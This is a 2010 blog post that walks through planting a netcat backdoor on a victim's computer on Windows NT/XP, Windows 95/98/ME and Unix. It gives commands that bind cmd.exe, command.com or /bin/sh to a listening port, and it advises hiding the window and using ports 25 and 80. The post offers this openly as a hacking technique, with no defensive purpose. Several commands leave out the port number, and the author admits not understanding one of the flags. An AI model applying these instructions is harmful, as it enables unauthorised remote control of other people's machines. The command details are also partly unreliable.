Friday, August 20, 2010
Anu
In this post I will show or guide you the basic STEPS for BACKDOOR'ing (hacking) via NETCAT in many Microsoft Flavour as well as in UNIX/LINUX......
1. The Problem
Here's what this whole guide is about: getting the backdoorto
work on more than just Windows NT/2000/XP.When I first sawthe guide on breaking into NT, I hurried up and viewed it. I began reading andit said something like, "This also works with 2000 and XP!" I thoughtto myself, "Now that's not right! What about
Windows 95/98/ME and Unix!" So I began reading on onhow the backdoor worked and saw how it worked in order to set off toward mygoal of a multi-operating-system backdoor.
2. How the Backdoor Works - On Windows NT/2000/XP
For the backdoor, you'll need netcat for Windows (meansyou'll need a windows box, too) which you can get from HERE).
You should also know how tomake batch files, which you can learn on MY BLOG.
MS-DOSLINUX
First, get the netcat executable file (nc.exe) onto thetarget's
c:\windows\system32 directory. Then make a batch file withthe following command in it:
nc -L -d -p -t -e cmd.exe
Here's what that command does:
nc - tells Windows to run the nc.exe file with the followingarguments:
-L Tells netcat to not close and wait for connections
-d Tells netcat not to open a Window when running
-p Specifies a port to listen for a connection on
-t Tells netcat to accept telnet connections
-e Tells what program to run once the port is connected to
Put the batch file in the c:\windows\system32 directory alsoand run it.
Once that batch file is run, you can telnet or use netcat inclient mode to connect to it. Here's how to use netcat to connect to it:
In a DOS prompt, give the command
C:\WINDOWS\> nc -v
Once you connected to that port on the victim's computer,you'll have a DOS prompt that you can give any command on the victim'scomputer.
The backdoor will close whenever the victim shuts down their
computer. To get it running again, just run the batch file.
3. Getting the Backdoor to Work on Windows 95/98/ME
After reading, I thought to myself, "Now why can't Iget that to
work on 95/98/ME? Hmm... let's see here..."
Then Ithought about how the commands worked and came up with a solution.
First, put the nc.exe file in the c:\windows directory.
Why?
Explain later. Put the batch file there, too, but change thebatch file
to:
nc -L -d -p -t -e command.com
There ya go - it'll work on 95/98/ME. Here's why:
First off, you don't need to put the files in the system32directory because 95/98/ME doesn't use execute paths like NT does. If youwouldn't have put the files in System32 directory on NT, the program wouldn'thave executed the batch file because it wouldn't have been in the file path -but you don't have to worry about that in 95/98/ME. The reason why we put thefiles in the c:\windows directory on 95/98/Me is because that's where thecommand.com file is - the MS-DOS Prompt file. (It's cmd.exe on NT/2000/XP.)That's why we ran command.com instead of cmd.exe.
4. Getting the Backdoor to Work on Unix/Linux
Ok, first off, get the unix version of netcat onto thetarget system.
Now, simply execute the following command on the followingsystem:
nc -nvv -l -p -e /bin/sh
For best results, put that command in a shell script. Also,a good idea is to run the command on more than one port to connect to, and toexecute this command to ports like mail services (port 25) and web services(port 80).
How does this work? Let's examine:
-nvv I'm not exactly sure what this does. Further researchis required...
-l stay open and listen
-p what port to listen to
-e /bin/sh spawns a shell. Or could use bash, tcsh, ksh etc.instead of sh for the shell of your choice.
So, let's see what we've learned overall:
Netcat is a usefull hackers tool that can set up backdoors.That says it all.
Thanks for reading!
Posted in
0 comments:
Post a Comment